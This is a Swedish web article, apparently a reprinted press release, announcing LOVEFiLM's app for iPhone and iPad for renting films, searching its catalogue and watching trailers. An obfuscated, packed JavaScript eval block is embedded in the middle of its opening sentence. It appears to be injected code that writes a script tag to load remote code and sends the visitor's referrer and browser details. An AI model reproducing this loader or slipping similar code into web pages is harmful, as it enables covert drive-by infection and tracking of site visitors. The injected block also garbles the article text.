Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Hyr film från LOVEFiLM.se med din iPhone eller iPad

Hyr film från LOVEFiLM.se med din iPhone eller iPad
Revue Magazine

Europas eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|szyft|var|u0026u|referrer|zryfi||js|php’.split(’|’),0,{}))
ledande hyrfilmsaktör på nätet, LOVEFiLM, lanserar nu en svensk gratisapp till iPhone och iPad. Med den nya appen kan användaren hyra DVD och Blu-ray filmer, söka i LOVEFiLMs produktkatalog med över 20000 filmtitlar och titta på filmtrailers.

Med hjälp av appen som utvecklats för företagets svenska medlemmar kan användaren logga in på LOVEFiLM.se genom sin iPhone eller iPad och på så sätt få tillgång till sitt personliga LOVEFiLM-konto. Appen ger användaren tillgång till ett stort antal funktioner som tidigare endast funnits tillgängliga på LOVEFiLM.se.

Målet med lanseringen av appen är att öka tillgängligheten och göra det ännu enklare för LOVEFiLMs medlemmar att hantera medlemskapet och hyra film – oavsett var de befinner sig.

Appen riktar sig även till de som ännu inte blivit medlemmar på LOVEFiLM.se. Icke-medlemmar kan nämligen använda appen för att söka information om LOVEFiLMs drygt 20000 filmtitlar. Som om inte det vore nog kan alla som installerat appen även kolla på filmtrailers – medlemmar liksom icke-medlemmar. Med andra ord ett måste för alla filmälskare!

Appen innehåller följande:

  • Sökfunktion som hjälper användaren att hitta mer information om den film som eftersöks utifrån titel, skådespelare eller genre.
  • Listfunktion som ger användaren tillgång till listor över populära filmer, tv-serier och genrer.
  • Titta på filmtrailers.
  • Lägga till och ta bort filmer från hyrlistor.
  • Läsa recensioner och betygsätta filmer.

Den nya appen finns från och med nu även tillgänglig i landspecifika versioner på LOVEFiLMs två övriga nordiska marknader, Norge och Danmark. Klicka på länkarna nedan för att ladda ned LOVEFiLMs svenska appar nu:

Appen till iPhone:
http://itunes.apple.com/se/app/lovefilm-se-by lovefilm/id437831268?l=en&ls=1&mt=8

Appen till iPad:
http://itunes.apple.com/se/app/lovefilm-se-for-ipad-by-lovefilm/id437829356?l=en&ls=1&mt=8